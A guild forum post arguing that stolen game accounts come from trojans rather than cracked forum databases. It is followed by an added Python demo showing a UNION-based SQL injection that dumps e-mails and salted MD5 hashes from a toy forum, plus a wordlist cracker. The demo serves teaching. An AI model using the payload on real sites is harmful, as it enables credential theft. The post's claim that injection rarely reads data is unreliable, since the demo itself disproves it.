It's interesting, but the conclusion is wrong.
Killemal wrote: Interesting comment about where stolen info is coming from; Guild Forums. Not to knock our beautiful and wise forum and site admins, but for safety's sake, you may want to change your forum contact e-mail address and forum password to ones NOT matching your Battle.net login. If someone were to crack our PHP DB and steal your forum login info they could use that to guess your Battle.net login credentials and in turn loot your drood.
I read the Symantec article yesterday which concludes that the actual source is a trojan, not guild forums. You're deriving your conclusion from a comment on the site that is neither formally verified nor presented alongside any proof. The dude can't even spell "phpBB" for one and is totally talking out of his ass. Here's the pertinent bit about what he said along with my rationale for claiming he's an idiot:
Find a popular guild, track down their website, and if they're using an old version of phpHB or whatever, it's a pretty simple script-kiddie process to crack those and get a nice big table that has all the e-mail/password combos. Fire up WoW and start punching them in until you've got a winner.
This bit largely depends on finding an SQL injection vulnerability in the host software. Don't get me wrong, phpBB has a LOT of those, but as the years have gone by many of them have been plugged. Turus and I have taken pretty extensive precautions to attempt to limit the likelihood of these existing. Furthermore, it's also important to understand that an SQL injection vulnerability often doesn't necessarily mean the attacker has control of the database (they can't get your e-mail), and in fact, here's the problem with that commenter's reasoning:
First, virtually EVERY attack I have seen that targets sites even with SQL injection vulnerabilities VERY rarely accomplishes gaining complete access to the associated tables. SQL injection is called "injection" precisely because of that--they use the vulnerability to inject data, not read it. Second, gaining access to someone's e-mail means absolutely nothing--you still have to get the password.
And the third bombshell that points out that the poster knows absolutely nothing is that the passwords are all hashed, typically using MD5. Most forum software these days uses a hash + salt to increase entropy in the password. There are ways, of course, to attack hashes, but it's going to be a fairly lengthy process unless they use rainbow tables (which have their limitations as well and don't work as well with SHA1/SHA256).
Let me repeat: PASSWORDS ARE NOT STORED IN PLAIN TEXT. THEY ARE NOT READABLE.

Now, that's not to say this isn't a concern. SQL injection is a problem, because it's feasible (and I've seen this many times with vBulletin-based boards) that attackers can inject script code into templates for certain message boards (not phpBB because it doesn't store templates in the database) that inject JavaScript that usually attempts to load up (in the background, possibly in an iframe) a site that contains an infected Flash movie or some such that actually installs the trojan--or some are even more clever and use vulnerabilities in MSIE.
In other words, the forum software acts only as an intermediary, if it's compromised. The user accounts are harvested by way of trojan, installed on the user's system. It's exactly the same method that accounts have been compromised before, just that the target is vulnerable message board software. And for the record, the software I've seen thus far with the most widespread vulnerability has been vBulletin 3.8.x. I've seen this particular method in the wild on a number of sites, and it's an attack that is easily automated. phpBB's design, being rather primitive, isn't necessarily susceptible to this. It is susceptible to other things, but as I've mentioned--Turus applied a number of patches and updates, and I've made some personal modifications to the source to try limiting this.
Killemal wrote: Thal and Turus: Feel free to add this info to the scammers stickied post if you see fit
It's an interesting article, but the comments on the source link represent a real knee-jerk reaction to forum security. I'm not going to add this since I think it would do more to scare people away from the forums than it would to actually protect them and their accounts. And we know that the forums are sorely lacking in terms of guild visitors.
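Editor's added example, not part of the thread above and not phpBB or vBulletin code: the post argues about whether an SQL injection in a board can hand an attacker the users table and whether salted MD5 hashes are then usable. This toy script builds a two-table SQLite "forum" with constructed accounts, runs a post search that pastes user input into the SQL text (the bug shape the post is discussing) next to a parameterised version, shows a UNION injection in that single lookup returning e-mail, salt and hash from the users table, and then runs a small constructed wordlist against the salted MD5 hashes. The per-user salt makes a precomputed md5(password) table useless, but a wordlist is simply re-hashed with each salt, so the weak constructed password falls and the long one does not. Table names, account names, passwords and the wordlist are all invented for the demo.

```python
# Added example (not from the original thread): toy forum DB, an injectable
# lookup, a UNION read of another table, and a wordlist attack on salted MD5.
# All accounts, passwords and the wordlist are constructed for this demo.
import hashlib
import secrets
import sqlite3
from typing import Dict, List, Optional, Tuple


def md5_salted(password: str, salt: str) -> str:
    """Salted MD5 in the shape older boards used: md5(salt + password)."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def build_forum_db() -> sqlite3.Connection:
    """In-memory 'forum' with a users table and a posts table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "email TEXT, salt TEXT, pw_hash TEXT)")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, username TEXT, subject TEXT)")
    # One weak password, one long passphrase; salts are random per user.
    accounts = [("drood_main", "drood@example.invalid", "hunter2"),
                ("turus", "turus@example.invalid", "correct horse battery staple 9!")]
    for name, email, pw in accounts:
        salt = secrets.token_hex(4)
        conn.execute("INSERT INTO users (username, email, salt, pw_hash) VALUES (?,?,?,?)",
                     (name, email, salt, md5_salted(pw, salt)))
    conn.execute("INSERT INTO posts (username, subject) VALUES ('drood_main', 'Raid tonight')")
    conn.commit()
    return conn


def search_posts_vulnerable(conn: sqlite3.Connection, author: str) -> List[Tuple[str, str]]:
    """Deliberately vulnerable: the author string is spliced into the SQL text."""
    sql = f"SELECT username, subject FROM posts WHERE username = '{author}'"
    return conn.execute(sql).fetchall()


def search_posts_safe(conn: sqlite3.Connection, author: str) -> List[Tuple[str, str]]:
    """Parameterised form: the input is bound as data and cannot alter the query."""
    return conn.execute("SELECT username, subject FROM posts WHERE username = ?",
                        (author,)).fetchall()


# A read-only query is enough to exfiltrate: the UNION appends rows from a
# different table to the posts result, and the trailing -- comments out the
# closing quote the application added.
DUMP_PAYLOAD = "x' UNION SELECT email, salt || ':' || pw_hash FROM users --"


def dump_credentials(conn: sqlite3.Connection) -> Dict[str, Tuple[str, str]]:
    """Pull email -> (salt, hash) out of the users table via the posts search."""
    leaked = {}
    for email, salted in search_posts_vulnerable(conn, DUMP_PAYLOAD):
        salt, pw_hash = salted.split(":", 1)
        leaked[email] = (salt, pw_hash)
    return leaked


# Constructed wordlist. A precomputed table of md5(password) does not match
# md5(salt + password), but re-hashing a wordlist per salt is cheap.
WORDLIST = ["password", "123456", "hunter2", "letmein", "qwerty", "wowrocks"]


def crack(leaked: Dict[str, Tuple[str, str]],
          wordlist: List[str] = WORDLIST) -> Dict[str, Optional[str]]:
    """Dictionary attack: try every word against each user's own salt."""
    found: Dict[str, Optional[str]] = {}
    for email, (salt, pw_hash) in leaked.items():
        found[email] = next((w for w in wordlist if md5_salted(w, salt) == pw_hash), None)
    return found


def demo() -> Dict[str, Optional[str]]:
    """Run the full chain: build DB, inject, crack. Returns email -> password or None."""
    conn = build_forum_db()
    # The parameterised search just treats the payload as an unknown author name.
    assert search_posts_safe(conn, DUMP_PAYLOAD) == []
    return crack(dump_credentials(conn))


if __name__ == "__main__":
    for email, pw in demo().items():
        print(f"{email}: {'cracked -> ' + pw if pw else 'not in wordlist'}")
```

The point of the salt shows up in `crack`: it forces the attacker to hash the wordlist once per user instead of once for everyone, which is the only thing it buys. Password length and unpredictability, and a slow hash such as bcrypt rather than MD5, are what actually make the leaked table hard to use.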